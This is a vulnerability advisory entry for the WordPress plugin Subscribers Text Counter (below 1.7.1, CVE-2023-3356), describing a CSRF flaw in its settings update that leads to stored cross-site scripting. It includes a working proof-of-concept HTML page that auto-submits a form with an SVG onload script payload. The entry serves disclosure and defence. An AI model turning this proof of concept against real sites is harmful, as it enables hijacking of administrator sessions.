Lucene search
Pallab Jyoti BorahWPEX-ID:93FAAD5B-E1E8-4E49-B19E-B91343D68B51HistoryAug 04, 2023 - 12:00 a.m.
Subscribers Text Counter < 1.7.1 - Settings Update via CSRF to Stored XSS
2023-08-0400:00:00
Pallab Jyoti Borah
30
html
admin access
csrf
stored xss
settings update
plugin vulnerability
exploit
0.0005 Low
EPSS
Percentile
17.1%
Description The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack, which also lead to Stored Cross-Site Scripting due to the lack of sanitisation and escaping
Create an HTML file with the following content and have a logged in admin access it:
```
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/options-general.php?page=subscribers_text_counter" method="POST">
<input type="text" name="twitter" value='"><svg/onload=alert(2);>'>
<input type="text" name="stextcount_hidden" value="settings">
<input type="submit" value="submit">
</form>
</body>
```
Navigate to the plugin's settings to trigger the XSS.Related
prion
prion
Cross site scripting
2023-08-30 15:15:00
nvd
nvd
CVE-2023-3356
2023-08-30 15:15:09
wpvulndb
wpvulndb
Subscribers Text Counter < 1.7.1 - Settings Update via CSRF to Stored XSS
2023-08-04 00:00:00
cve
cve
CVE-2023-3356
2023-08-30 15:15:09
cvelist
cvelist
wordfence
wordfence